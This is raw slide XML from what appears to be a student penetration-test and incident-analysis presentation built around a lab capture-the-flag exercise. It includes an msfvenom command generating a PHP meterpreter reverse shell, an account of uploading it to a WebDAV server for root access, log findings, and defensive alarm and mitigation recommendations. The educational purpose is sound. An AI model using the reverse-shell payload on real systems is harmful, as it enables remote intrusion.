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B33C20-51FE-4208-8B7B-8A7901A86086}">
  <a:tblStyle styleId="{DDB33C20-51FE-4208-8B7B-8A7901A860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 Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4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5.png"/><Relationship Id="rId6"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8.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49.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image59.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image54.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image62.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image6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0.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8.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image5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5.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image64.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image6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75.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image68.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image65.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image69.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image74.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image7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83.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image85.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image7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84.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9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78.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image79.png"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image81.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image90.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image80.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image93.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image8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2.png"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image102.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image99.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image94.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image98.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image10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 Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image10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9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1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0.pn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9.pn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9.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image114.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1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9.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image116.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1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9.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7.png"/><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Remote File Inclusion</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1136" name="Google Shape;1136;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7" name="Google Shape;1137;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Leveraged MSFVenom to create a Reverse_tcp Shell payload to be executed on the Target Host to establish connection to the listener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9" name="Google Shape;1139;p63"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457181" y="887903"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1140" name="Google Shape;1140;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1" name="Google Shape;1141;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3"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3228956" y="887903"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1143" name="Google Shape;114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4" name="Google Shape;114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Able to upload created payload to the webdav server and execute the script which was picked up by meterpreter and gain access to the webdav server and gained root access. The hidden flag file was found. </a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1147" name="Google Shape;1147;p63"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6134081" y="888653"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1148" name="Google Shape;114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9" name="Google Shape;114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msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.90  LPORT=4444 &gt; exploit.php</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52" name="Google Shape;1152;p63"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6024000" y="2613312"/>
            <a:ext cx="2805675" cy="888825"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1153" name="Google Shape;1153;p63"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6254950" y="3616575"/>
            <a:ext cx="2574725" cy="482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id="1158" name="Google Shape;1158;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59" name="Google Shape;1159;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0" name="Google Shape;1160;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6" name="Google Shape;1166;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7" name="Google Shape;1167;p65"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1854650" y="635150"/>
            <a:ext cx="4911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port scan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>occurred</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t> at 1:30am</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
          <a:p>
            <a:pPr indent="-167640" lvl="0" marL="320040" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>67,899 requests were made from IP 192.168.1.90</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
          <a:p>
            <a:pPr indent="-167640" lvl="0" marL="320040" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>The number of requests and destination port changing in the logs</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1168" name="Google Shape;1168;p65"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1903925" y="794312"/>
            <a:ext cx="424701" cy="331225"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1169" name="Google Shape;1169;p65"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="871300" y="1532950"/>
            <a:ext cx="7401405" cy="3516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5" name="Google Shape;1175;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6" name="Google Shape;1176;p66"/>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77" name="Google Shape;1177;p66"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1489300" y="710675"/>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12,820 Requests were made at 2:30am</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
          <a:p>
            <a:pPr indent="-167640" lvl="0" marL="320040" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>The company_folders/secret_folder contained a password hash and instructions to access the webdav server</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1178" name="Google Shape;1178;p66"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1489300" y="835150"/>
            <a:ext cx="424701" cy="331225"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1179" name="Google Shape;1179;p66"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1467775"/>
            <a:ext cx="5617303" cy="2384100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1180" name="Google Shape;1180;p66"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5617303" y="1467775"/>
            <a:ext cx="3424647" cy="2384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6" name="Google Shape;118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7" name="Google Shape;1187;p67"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="1188" name="Google Shape;1188;p67"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1774650" y="719387"/>
            <a:ext cx="424701" cy="331225"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1189" name="Google Shape;1189;p67"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2" y="1467775"/>
            <a:ext cx="1917400" cy="2949113"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1190" name="Google Shape;1190;p67"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1917400" y="1457004"/>
            <a:ext cx="7334471" cy="2611072"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1191" name="Google Shape;1191;p67"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1676400" y="62555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6,365 requests were made</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
          <a:p>
            <a:pPr indent="-167640" lvl="0" marL="320040" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>6,274 requests were made before the brute force attack stopped.</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7" name="Google Shape;1197;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8" name="Google Shape;1198;p68"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1676400" y="65965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51 requested were made</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
          <a:p>
            <a:pPr indent="-167640" lvl="0" marL="320040" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>Shell.php was requested </a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1199" name="Google Shape;1199;p68"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1774650" y="753487"/>
            <a:ext cx="424701" cy="331225"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1200" name="Google Shape;1200;p68"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1040375" y="1346150"/>
            <a:ext cx="7312364" cy="3570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id="1205" name="Google Shape;1205;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6" name="Google Shape;1206;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7" name="Google Shape;1207;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13" name="Google Shape;121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4" name="Google Shape;1214;p70"/>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endParaRPr sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="❖"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>Set an alarm based on a single IP attempting to connect to or scan different destination ports.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A threshold of 60 seconds</a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1215" name="Google Shape;1215;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304800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="❖"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Implement a firewall or IPS to detect the scans and  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>block</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> scans.</a:t>
            </a:r>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304800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="❖"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Disable ping activity outside of known IP ranges</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="❖"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Use an IDS like Kibana or SPLUNK to allow for immediate alerting of port scan activity.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21" name="Google Shape;122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2" name="Google Shape;1222;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317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="❖"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>Alerts can be set up multiple 401 failures from a single IP</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10 failures within 60 seconds</a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1223" name="Google Shape;1223;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317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="❖"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Set stronger usernames and passwords requirements for users that have access to the hidden directory</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="❖"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Encrypt the contents of the hidden directories and use MFA</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317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="❖"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Create a whitelist for authorized IP addresses. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="❖"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Change permissions of folder to make it private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29" name="Google Shape;122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0" name="Google Shape;1230;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317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="❖"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>An alarm that alerts for an excessive amount of failed attempted logins from a single user.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The threshold should be set to 5 failed login </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>attempts</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t> that will lock the account and alert the security analyst</a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1231" name="Google Shape;1231;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brute force attacks?</a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="❖"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>Set account lockout rules</a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="❖"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>Require Multi-Factor Authentication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317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="❖"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>Require strong passwords and password expiration</a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="❖"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>Require Multi-factor authentication</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37" name="Google Shape;123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8" name="Google Shape;1238;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317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="❖"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>Alert when connections are made from unknown IP addresses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The alarm should </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>activate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>anytime</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t> 1 connection is made from an unknown IP address</a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1239" name="Google Shape;1239;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317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="❖"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>Not allow access to restricted directories/files from HTTP.</a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="❖"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>Set a whitelist of IP addresses that can access the directory and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>block</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t> all other requests.</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317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="❖"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>Create whitelist all known and authorized IPs and block other traffic.</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45" name="Google Shape;1245;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6" name="Google Shape;1246;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317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="❖"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>Alert for a put command from unknown ip placed onto the server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Any attempt to execute a PROPFIND command from an unknown IP should trigger the alert</a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1247" name="Google Shape;1247;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317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="❖"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>Restrict file uploads of all types to come only from internal networks.</a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="❖"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>Have all files run through an antivirus</a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
